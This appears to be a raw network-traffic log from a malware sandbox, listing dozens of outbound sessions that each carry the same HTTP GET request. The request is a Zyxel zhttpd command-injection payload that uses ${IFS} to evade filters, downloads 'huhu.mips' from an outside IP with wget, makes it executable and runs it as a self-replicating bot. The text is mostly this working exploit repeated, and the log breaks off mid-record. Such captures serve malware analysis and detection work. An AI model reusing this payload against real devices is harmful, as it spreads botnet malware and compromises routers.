                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.320920944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9165192.168.2.144984097.145.46.146443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.320950031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9166192.168.2.1442332182.31.40.103443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.321000099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9167192.168.2.144949238.34.215.211443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.321041107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9168192.168.2.1457012114.152.13.44443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.321047068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9169192.168.2.1435782121.225.136.217443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.321094036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9170192.168.2.143450454.198.186.255443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.321145058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9171192.168.2.143524432.118.1.87443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.321185112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9172192.168.2.145271062.78.194.36443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.321198940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9173192.168.2.145952090.120.206.51443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.321244001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9174192.168.2.145163451.178.13.93443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.321294069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9175192.168.2.1452402172.187.84.86443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.321305037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9176192.168.2.1434098130.87.134.103443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.321365118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9177192.168.2.1457326166.64.177.216443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.321373940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9178192.168.2.1451870171.235.214.83443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.321435928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9179192.168.2.1441106113.76.158.69443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.321475983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9180192.168.2.1452044123.74.49.249443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.321476936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9181192.168.2.143863447.90.59.187443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.321523905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9182192.168.2.144649243.187.59.251443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.321557999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9183192.168.2.143668297.188.211.122443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.321607113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9184192.168.2.1448128198.134.214.161443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.321641922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9185192.168.2.143722413.35.143.134443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.321681976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9186192.168.2.144486827.218.52.230443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.321719885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9187192.168.2.143796423.88.246.181443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.321759939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9188192.168.2.1450652154.90.95.6443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.321782112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9189192.168.2.1434394208.127.160.79443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.321834087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9190192.168.2.1442168122.116.184.49443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.321856022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9191192.168.2.144568657.245.155.152443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.321907997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9192192.168.2.144344414.154.209.184443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.321930885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9193192.168.2.143611279.87.89.97443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.321959972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9194192.168.2.1448718188.183.156.251443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.322005987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9195192.168.2.1452156222.104.199.117443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.322045088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9196192.168.2.1443546191.127.142.101443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.322086096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9197192.168.2.1451710133.170.56.94443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.322129965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9198192.168.2.1454802187.18.69.69443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.322154045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9199192.168.2.1434326167.34.151.138443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.322180986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9200192.168.2.1442276217.155.150.42443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.322216988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9201192.168.2.1434788109.25.100.157443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.322244883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9202192.168.2.143296652.194.87.93443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.322309017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9203192.168.2.143397017.149.193.34443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.322362900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9204192.168.2.145288219.171.34.43443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.322388887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9205192.168.2.1443826147.95.120.102443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.322437048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9206192.168.2.143578689.39.166.228443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.322500944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9207192.168.2.1434680181.171.251.227443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.322540045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9208192.168.2.1433604199.205.111.86443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.322588921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9209192.168.2.1447526164.97.180.122443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.322629929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9210192.168.2.144767851.45.214.223443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.322654963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9211192.168.2.1454594140.13.101.173443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.322700977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9212192.168.2.144497612.50.124.255443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.322726965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9213192.168.2.144363867.178.221.5443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.322772980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9214192.168.2.1448240122.88.250.240443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.322803020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9215192.168.2.1434610181.115.52.200443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.322841883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9216192.168.2.1441270149.188.221.175443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.322875023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9217192.168.2.1442216108.167.12.46443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.322940111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9218192.168.2.1452170190.196.92.80443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.322974920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9219192.168.2.145975423.62.255.132443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.323009968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9220192.168.2.14506784.8.99.175443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.323030949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9221192.168.2.145029476.208.237.252443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.323097944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9222192.168.2.1458660114.123.26.70443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.323124886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9223192.168.2.1439274223.52.205.31443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.323160887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9224192.168.2.1450616140.222.125.221443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.323211908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9225192.168.2.145950288.142.12.151443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.323261023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9226192.168.2.145622424.15.41.99443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.323297977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9227192.168.2.144753475.22.192.110443
                                                        TimestampBytes transferredDirectionData
